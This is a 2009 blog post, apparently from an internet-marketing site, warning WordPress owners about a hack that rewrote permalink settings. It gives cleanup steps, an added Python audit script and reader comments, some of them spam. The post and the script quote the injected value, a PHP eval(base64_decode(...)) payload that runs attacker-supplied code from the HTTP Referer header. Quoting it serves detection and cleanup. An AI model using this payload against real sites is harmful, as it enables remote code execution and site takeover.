
BizExcellerated Internet Marketing: Achieve mastery in blogging, affiliate marketing, social traffic generation at Andrew Wee

URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

I checked my blog and the URLs looked malformed, with the following structure: http://www.whoisandrewwee.com/2009/09/03/unlocking-unconventional-traffic-sources-for-affiliate-campaigns/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929

If you notice something similar or weird with your WordPress blog, you might want to take the following steps:

  • Check the “users” tab from the WP admin interface
  • Remove any unfamiliar users, especially those marked as “administrator”
  • To prevent users from registering, I’d go as far as to remove wp-register.php (keep a backup and FTP it back in if you have problems)
  • Check all of WordPress’ PHP scripts and remove global “execute” privileges

Once you’ve secured the perimeter, look at the “Permalinks” tab under “Settings”.

If you see some weird stuff like “%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/#comment-506929”, you’d want to clear that and replace it with your original permalink structure, or look up the structure on the WordPress codex.
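The permalink and file-permission checks above can be scripted. The following is an added example, not part of the original post: it flags a permalink structure that contains anything other than WordPress structure tags and plain path text, and lists PHP files that are executable by everyone. The tag allow-list, the function names and the reading of “global execute” as the “other” execute mode bit are assumptions.

```python
import os
import re
import stat

# Structure tags documented for WordPress permalinks (assumed allow-list).
ALLOWED_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
                "post_id", "postname", "category", "author"}
TAG_RE = re.compile(r"%([a-z_]+)%")
SAFE_LITERAL_RE = re.compile(r"[A-Za-z0-9._/-]*")
CODE_MARKERS = ("eval(", "base64_decode", "$_SERVER")

# The injected value quoted in the post above.
INJECTED = ("%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))"
            "%7D%7D|.+)&%/#comment-506929")


def audit_permalink_structure(structure):
    """Return a list of findings; an empty list means nothing unexpected."""
    findings = []
    for tag in TAG_RE.findall(structure):
        if tag not in ALLOWED_TAGS:
            findings.append("unknown tag %" + tag + "%")
    # Whatever is left after removing %tag% tokens should be plain path text.
    literal = TAG_RE.sub("", structure)
    if not SAFE_LITERAL_RE.fullmatch(literal):
        bad = sorted(set(re.sub(r"[A-Za-z0-9._/-]", "", literal)))
        findings.append("unexpected characters: " + " ".join(bad))
    for marker in CODE_MARKERS:
        if marker in structure:
            findings.append("PHP code marker: " + marker)
    return findings


def world_executable_php(root):
    """List .php files under root whose mode has the 'other' execute bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php") and os.stat(path).st_mode & stat.S_IXOTH:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for value in ("/%year%/%monthnum%/%day%/%postname%/", INJECTED):
        print(value, "->", audit_permalink_structure(value) or "ok")
```

Feed `audit_permalink_structure` the value shown on the permalinks settings page, and point `world_executable_php` at a local copy of the WordPress directory.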

You can also check out this other blog post for more details.

Note: this issue seems to be affecting WordPress 2.6.x. Not sure to what extent it’s affecting version 2.8.x.

UPDATE: Matt Mullenweg from the WordPress development team has posted about the security issues if you’re using an older version of WordPress. Here’s a WP support forum write-up about what might be happening.

You might want to upgrade to a newer version of WordPress. Just take note that some of your plugins/themes might not work if the developer hasn’t updated the plugin for compliance with the newest version.

27 comments on URGENT: If Your WordPress Blog is Acting Strangely, Follow These Steps

  1. BrianB
    September 5, 2009 at 3:22 am (6 years ago)

    We got it, too. Is this a world wide problem? I googled the change script and it seems a few similar problems have popped out recently.

  2. Andrea_R
    September 5, 2009 at 4:00 am (6 years ago)

    Thanks for this post – we’ve seen it three times today, not sure what versions were running.

  3. mougela
    September 5, 2009 at 4:35 am (6 years ago)

    Thank you, it helped me tonight !! :)

  4. Mr Woc
    September 5, 2009 at 5:09 am (6 years ago)

    Hi there

    Many thanks for this information, I was at my wits’ end trying to resolve this lol, I think mine occurred because of installing the SEO plugin pack, but doing what you said on this post worked fine!


  5. Edward Mills
    September 5, 2009 at 5:37 am (6 years ago)

    They got me. Thanks for the info on how to clean it up. Wasn’t as cut and dried as you made it sound… had some trouble with my htaccess file. But it’s all good now!

  6. KirstyM
    September 5, 2009 at 6:12 am (6 years ago)

    Thanks so much Andrew, my blog was also similarly affected and I’ve followed your instructions to fix the issue. I’d have been completely stumped without this post.

    Wonder if they’re targeting online marketers, the rotters?!

  7. KirstyM
    September 5, 2009 at 7:20 am (6 years ago)

    Andrew – a colleague also affected has just told me that most people affected will also have had a new admin inserted directly into their SQL database that doesn’t show up in WordPress interface.

    I found this had been placed into my SQL db, it has obviously been stored for later foul internet deeds to be performed…

  8. Andrew Wee
    September 5, 2009 at 8:49 am (6 years ago)

    Hi Kirsty,
    Thanks for that. I’ll drop a note to my server admin.

    For those who’re using fantastico/cPanel, it should be an easy fix from the “mySQL database” or “phpMyAdmin” consoles.

  9. Luke Rumley
    September 5, 2009 at 1:28 pm (6 years ago)

    Lots more going on beneath the surface! Permalinks and hidden admin users! This blog post worked for me to clean house: http://blog.nachotech.com/?p=125

    I also renamed my xmlrpc.php and wp-register.php files as a stop-gap solution. It seems 2.8.4 blogs are safe so far. I am guessing 2.8.5 will be out ASAP to correct this if 2.8.4 doesn’t.

  10. Melayu
    September 5, 2009 at 1:43 pm (6 years ago)

    This post is very good for me. I can get many tips and tricks on this blog. Thanks for your information, my friend! This is my first time visiting your blog.

  11. Machja
    January 5, 2010 at 5:26 am (6 years ago)

    Thanks for your post! I just had the problem. :(

  12. Dire
    May 26, 2010 at 6:37 am (6 years ago)

    Thanx a lot! Really works!

  13. Erik
    March 10, 2011 at 3:51 am (5 years ago)

    This helps! Thank you! I was trying to figure out these problems the other day!

  14. doudoututu
    September 9, 2011 at 8:07 pm (4 years ago)

    I just could not depart your web website before suggesting that I really enjoyed the usual information a person offer on your visitors? Is going to be back continuously to check out new posts.

  16. pokemonxetyrom
    March 29, 2014 at 3:22 am (2 years ago)

    This helps! Thank you! I was trying to figure out these problems the other day!

  17. Kassie
    November 5, 2015 at 9:55 am (3 months ago)

    Thanks for sharing your thoughts about blogging.


  18. baby formula brands
    November 6, 2015 at 7:30 pm (3 months ago)

    Pretty nice post. I simply stumbled upon your weblog and wanted to mention that I’ve really loved surfing around your weblog posts. After all I’ll be subscribing in your feed and I am hoping you write again soon!

  19. holywood
    November 17, 2015 at 1:19 pm (3 months ago)

    Aw, this was an extremely nice post. Taking the time and actual effort to generate a really good article… but what can I say… I put things off a whole lot and never manage to get nearly anything done.

  20. metu.tv
    December 25, 2015 at 9:47 am (1 month ago)

    Hi there, would you mind letting me know which web host you’re working with? I’ve loaded your blog in 3 different internet browsers and I must say this blog loads a lot faster than most. Can you suggest a good web hosting provider at an honest price? Thanks a lot, I appreciate it!

  21. Yetta
    December 27, 2015 at 12:44 am (1 month ago)

    I happen to be writing to let you know what a nice experience my cousin’s girl enjoyed using your blog. She noticed so many details, which included what it is like to possess a very effective coaching spirit to get other people with no trouble have an understanding of a number of extremely tough issues. You undoubtedly exceeded our expectations. I appreciate you for distributing such practical, trusted, edifying and in addition easy tips about that topic to Kate.

  22. security services Of america
    January 25, 2016 at 9:45 am (2 weeks ago)

    What’s up to every one, for the reason that I am genuinely eager of reading this blog’s post to be updated daily. It includes nice information.
